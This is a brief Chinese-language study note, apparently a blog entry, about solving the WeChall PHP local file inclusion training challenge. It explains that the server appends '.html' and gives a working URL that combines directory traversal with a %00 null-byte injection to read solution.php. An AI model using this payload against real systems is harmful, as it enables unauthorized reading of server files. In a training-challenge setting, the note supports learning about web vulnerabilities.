LFI

PHP LFI

坑点是后面会加一个.html

http://sp4hack.blogspot.ca/2012/10/we-chall-training-php-lfi.html

这里的思路是加一个%00

  • Everything after the null byte will be deleted.

太帅了=_^

好像就是传说中的 Null Byte Injection ?

http://www.wechall.net/challenge/training/php/lfi/up/index.php?file=../../solution.php%00